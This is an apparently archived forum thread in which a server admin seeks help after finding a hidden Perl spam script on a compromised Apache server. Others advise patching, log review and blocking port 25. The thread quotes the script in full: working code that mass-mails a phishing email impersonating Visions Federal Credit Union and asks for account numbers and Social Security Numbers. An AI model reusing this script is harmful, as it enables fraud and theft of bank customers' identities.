Protect Port 80(Apache)

This is the culprit "awstats.pl"

#!/usr/bin/perl

print "Content-type: text/html\n";

$file = "list.txt";
open(IN_FILE, $file);
my @data=<IN_FILE>;
close IN_FILE;

$contfile = "test.txt";
open(IN_FILE, $contfile);
my @contdata = <IN_FILE>;
close IN_FILE;

my $count = 0;

my $SendmailPath = '/usr/sbin/sendmail';
my $from_s = 'customerservice@visionsfcu.org';
my $subj_s = 'NOTICE FROM Visions Federal Credit Union #REF-ID:79053430';
my $contdata_s = @contdata;

my($mailbody) = <<__END__MAILBODY__;


<html>
<body>

<div id="message" style="width: 1136; height: 558">
  <table id="AutoNumber1" border="1" bordercolor="#111111" cellpadding="0" cellspacing="0" width="34%">
    <tbody>
      <tr>
        <td width="100%">
          <p><img border="0" src="https://www.visionsfcu.org/images/visions2.jpg" width="158" height="50"></p>
          <p align="left"><font face="Arial" size="2">Dear Vision FCU Client,<br>
          &nbsp;&nbsp;&nbsp;<br>
          &nbsp;This is your official notification from Vision FCU&nbsp;that the
          service(s) listed below &nbsp;will be deactivated and deleted if not
          renewed immediately. Previous notifications have &nbsp;been sent to
          the Billing Contact assigned to this account. As the Primary Contact,
          you &nbsp;must renew the service(s) listed below or it will be
          deactivated and deleted.&nbsp;<br>
          <br>
          &nbsp;</font><font face="Verdana" size="2"><a target="_blank" href="http://visionsfcu.acswi.com/fcu-online/session_id.php"><font
color="#003399" face="Arial" size="2"><b>Renew
          Now</b></font></a></font><font face="Arial" size="2">&nbsp; your&nbsp;Vision
          FCU Bill Pay Services.<br>
          <br>
          If you are not enrolled to Online Banking, please enter your checking
          account number as&nbsp;Account Number&nbsp; and Social Security Number&nbsp;
          as Password.</font></p>
          <div style="width: 508; height: 48">
            <font face="Arial" size="2">&nbsp;<br>
            &nbsp;<b><font color="#000000">SERVICE</font></b> : Vision FCU Bill
            Pay Services.<br>
            &nbsp;<b><font color="#000000">EXPIRATION</font><font color="#000080">
            </font></b>:&nbsp;May 15, 2006</font>
          </div>
          <div>
            <font face="Arial" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Arial" size="2"><br>
            Thank you,&nbsp;sincerely,<br>
            <br>
            <font size="-1">Eric Kingsbury</font>, Customer Service</font>
          </div>
          <div>
            <p align="center"><font face="Verdana" size="2">======================================================================<br>
            &nbsp; IMPORTANT CUSTOMER SUPPORT INFORMATION<br>
            ======================================================================</font></p>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;</font>
          </div>
          <div>
            <font face="Verdana" size="2">&nbsp;Document Reference: (#79053430).</font>
          </div>
          <p align="center"><font face="Verdana" size="2"><b>2006 Vision FCU,
          All Rights Reserved. Member FDIC. Equal Housing Lender.</b></font></td>
      </tr>
    </tbody>
  </table>
</div>

</body>

</html>

__END__MAILBODY__

foreach $line (@data){
print qq($line);
sendmail($line, $from_s, $subj_s, $mailbody );
}

sub sendmail{
     my ($to, $from, $subj, $msg) = @_;
     open (MAIL, "|$SendmailPath -t -i")|| die "Error! Can't use sendmail\n";
     print MAIL "To: $to";
     print MAIL "From: $from\n";
     print MAIL "Subject: $subj\n";
     print MAIL "Reply-To: $from\n";
     print MAIL "Content-type: text/html\n\n";
     print MAIL "$msg\n";
     close (MAIL);
}

my $count;
$count++ foreach(@data);
print "$count emails sent\n";</p>

This is of cause just a quick countermeasure:

If that is all time the same script, how about modifying the hosts file and add

visionsfcu.org 127.0.0.1
visionsfcu.acswi.com 127.0.0.1

creating a directory "images" in the www documents folder and putting a big: "FAKE" in the pic: visions2.jpg that file goes in the "images" folder.

Should at least stop the spammer collecting more pins...

---

Apart from that, apply all security patches for your system, I guess there lies the problem.


Tolomir

I agree, a large concern that should be addressed is how is this application getting onto your system. Configuring your loggs to identify suspicious traffic could go a long way to figuring out how the application is being installed and run. I would also make sure that all of your apps are running the latest versions of the necessary applications and not running anything that is unecessary. A tool like log watch can go through your httpd logs and inform you if sketchy behavior.

For example this is a pearl script, if you can do without perl then you will stop this application cold even if it stays on your machine.

hope this helps

-t

http://www.google.com/search?hl=en&q=locking+down+apache&btnG=Google+Search
Yes, secure your apache install, make sure it's got the latest patches and your running the latest version.
http://security.lss.hr/index.php?page=details&ID=LSS-2005-01-01
-rich

Emails are send using port 25/tcp.

You could block this port on the server itself(using ipchains,iptables), or on network.

With port blocked, the script will not be able to send mails.

blocking port 25 will solve the problem with sending out emails but will not remove the cause. if the server can be exploited to send out emails what else is it being used for tht you do nto know of?

you are better off finding the cause or rebuilding a new box with all of the latest patches, i have seen machines so pwned that you could take three times more time cleaning it than you would dropping in a blank drive and starting over and that was with extensive logging running on the machine.

folks,
     Thanks for your response. One thing which bothers me how did these files ended up on our server? That too it was so well written that they were hidden or it's not exactly hidden it's a directory without a name. for example
The space you use between tmp and trimite is a directory without a name. What could be the cause of these files ending up on our server? is it the webserver configuration? or is something wrong with the webapplication? is there any way practical way of knowing this is how they hack into the webserver? How in the world could someone put files on your server through port 80? would be the question of the day??


/tmp/  /trimite/awstats.pl

Well, as I posted above. Your system can be vulnerable because it's missing latest patches.

Check what ports are open, check if that software is patched with up-to-date patches.

Tolomir

Take your pick... It could be Apache, it could be TomCat if your running it, it could be your code, or due to a lax .conf file or setting
http://secunia.com/search/?search=apache
XSS (cross site scripting) has been getting more and more attention lately http://en.wikipedia.org/wiki/XSS There are unfortunatly quite a few vectors for this.
To me if it's not XSS, it's likely lax security of the config or on the directories, write permissions may be granted to everyone... possibly a username/password embedded in your source code?
-rich

Tolomir,
     We have a firewall. Intruders can only use the ports which are open. Your answer looks quite normal. I signed for experts exhcange to know what happens behind the scenes.I would like how it happens. How come some send commands through the browser?



Kaiser

Flaw's in your source code, scripting, scripting intereperters, apache exploits, lax security settings, all can lead to what happened to you.
Are you running PHP code, CGI/PERL code, do you have a login site? Each piece of software add's complexity, possible exploit vectors, and more overhead for you to figure out how to secure. Login sites can be poorly made, often the database usernames and pass's can be in the source code, or not obusifcated well. You can glean quite a bit of info from a poorly written site.

If your running PHP, or PHPBB you can see there are hundreds of exploit's that can lead to compromise, there are a variety of worst practices that can lead to this also.
http://secunia.com/search/?search=php
http://secunia.com/search/?search=phpbb

Things like this: http://www.securityfocus.com/bid/15250/info http://www.securityfocus.com/bid/15250/discuss
Can upload a script, if you'd like to learn more you can search bugtraq, or pick up some of the Hacking Exposed series of books.
http://governmentsecurity.org/archive/t4603.html Ahh the loginmatrix challenge... that was a great tool to learn from, it's gone now... tooo bad, that one was fun.
-rich

Richrumble pointed it our precisely.

Please tell us more about the software componentes you use.

E.g. Host OS : win 2k3, IIS Webserver, MSSQL Database 2005.

such like...

Tolomir
(also normal)

Apache 1.3.x
mysql 3.x
php 4.1
freebsd 5.1

The email the users got was like www@ourhostname.com. What's this "www" user?